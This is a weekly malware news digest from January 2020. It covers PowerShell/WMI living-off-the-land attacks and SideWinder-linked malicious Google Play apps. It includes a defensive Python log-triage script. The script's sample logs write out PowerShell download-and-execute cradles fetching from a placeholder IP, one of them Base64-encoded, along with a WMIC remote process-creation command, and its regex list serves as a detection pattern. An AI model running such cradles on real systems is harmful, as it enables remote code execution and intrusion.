Malware Watch - W/E - 1/10/20
Attackers Turn Legitimate, Native Tools into Threat Mechanisms (12/27/2019)
Research on living-off-the-land (LotL) techniques, in which attackers abuse tools and features that are already present on the target system, shows that attackers relied most heavily on PowerShell, Windows Management Instrumentation (WMI), and the WMI command-line utility (WMIC) to download or copy payloads onto target computers. Use of these tools rose sharply beginning in September 2019; Symantec blocked more than 480,000 malicious PowerShell scripts on endpoints during that month alone.
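Because the tools above are legitimate, detection has to key on how they are used rather than on their presence. The script below is an added example, not code from the article or from Symantec: it scans PowerShell script-block style log lines (the kind produced by Event ID 4104 logging) for the download-and-execute patterns the research describes, including WebClient download cradles, in-memory execution via IEX, WMIC `process call create`, copies from UNC paths, and Base64 `-EncodedCommand` payloads, which it decodes before matching. The sample log lines, the indicator list, and the flagging threshold are all constructed assumptions for illustration; real deployments tune them against their own baseline.

```python
import base64
import re

# Assumed indicator set: (regex, label). Chosen to cover the PowerShell/WMI
# download-or-copy-then-execute behaviours described in the article.
INDICATORS = [
    (r"New-Object\s+(?:System\.)?Net\.WebClient|\[Net\.WebClient\]", "WebClient object"),
    (r"\.Download(?:String|File|Data)\(", "WebClient download method"),
    (r"\bInvoke-WebRequest\b|\bInvoke-RestMethod\b|\b(?:iwr|irm|curl|wget)\b", "web request cmdlet"),
    (r"\bIEX\b|\bInvoke-Expression\b", "in-memory execution"),
    (r"\bwmic(?:\.exe)?\b.*\bprocess\s+call\s+create\b", "WMIC process creation"),
    (r"\bInvoke-WmiMethod\b.*\bCreate\b|\bWin32_Process\b.*\bCreate\b", "WMI Win32_Process.Create"),
    (r"\bCopy-Item\b.*\\\\|\bcopy\b.*\\\\", "copy from UNC path"),
    (r"-w(?:indowstyle)?\s+hidden\b", "hidden window"),
    (r"-(?:nop|noprofile)\b", "profile bypass"),
]
COMPILED = [(re.compile(p, re.IGNORECASE), label) for p, label in INDICATORS]

# -e / -ec / -enc / -EncodedCommand followed by a Base64 token.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Constructed sample data (not real telemetry). The encoded line is built from
# plaintext here so the Base64 is guaranteed to be correct UTF-16LE, which is
# what PowerShell expects for -EncodedCommand.
ENCODED_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"
ENCODED_PAYLOAD = base64.b64encode(ENCODED_PLAINTEXT.encode("utf-16le")).decode("ascii")

SAMPLE_LOGS = [
    # Classic download cradle executed in memory from a hidden window.
    "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')\"",
    # Same cradle hidden behind -enc.
    f"powershell.exe -nop -w hidden -enc {ENCODED_PAYLOAD}",
    # WMIC used to spawn PowerShell on a remote host and copy a payload from a share.
    r'wmic /node:"FILESRV01" process call create "powershell -nop -c Copy-Item \\192.0.2.10\share\p.exe C:\Windows\Temp\p.exe"',
    # Benign administration: no indicators.
    r"Get-ChildItem C:\Users -Recurse | Where-Object { $_.Length -gt 10MB }",
    # Benign-looking download to disk: one indicator only, below the threshold.
    r"Invoke-WebRequest -Uri https://update.contoso.example/manifest.json -OutFile C:\ProgramData\update\manifest.json",
]


def decode_encoded_command(line):
    """Return the decoded -EncodedCommand payload as text, or None if absent/invalid."""
    m = ENC_RE.search(line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def analyze(line):
    """Return the ordered list of distinct indicator labels found in a log line.

    The raw line and (if present) the decoded -EncodedCommand payload are both
    matched, so encoding the cradle does not hide it from the indicators.
    """
    found = []
    decoded = decode_encoded_command(line)
    if decoded is not None:
        found.append("encoded command")
    for text in (line, decoded or ""):
        for regex, label in COMPILED:
            if label not in found and regex.search(text):
                found.append(label)
    return found


def triage(lines, threshold=2):
    """Return (line, indicators) pairs for lines with at least `threshold` indicators.

    A single download primitive is common in legitimate administration, so the
    assumed default requires two co-occurring indicators before flagging.
    """
    flagged = []
    for line in lines:
        hits = analyze(line)
        if len(hits) >= threshold:
            flagged.append((line, hits))
    return flagged


if __name__ == "__main__":
    for line, hits in triage(SAMPLE_LOGS):
        print(f"FLAGGED [{', '.join(hits)}]\n    {line[:90]}")
```

Run against the constructed sample, the script flags the plain cradle, the encoded cradle, and the WMIC-plus-UNC-copy line, while leaving the `Get-ChildItem` and the single `Invoke-WebRequest` lines unflagged. The threshold is the practical caveat: admins also use `Invoke-WebRequest` and WMI, so a useful rule looks for combinations (download plus in-memory execution, hidden window plus encoded command) rather than any one legitimate tool.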
Malicious Apps Found in Google Play Linked to SideWinder Threat Group (01/06/2020)
Trend Micro researchers found three malicious apps in Google Play that work together to compromise a victim's device and collect user information. The three apps were disguised as photography and file manager tools. One of them, called Camero, exploits a vulnerability in Binder, Android's main inter-process communication (IPC) mechanism. The researchers believe all three apps are likely part of the SideWinder threat group's arsenal. SideWinder, active since 2012, is a known threat that has reportedly targeted Windows machines belonging to military entities. The apps have since been removed from Google Play.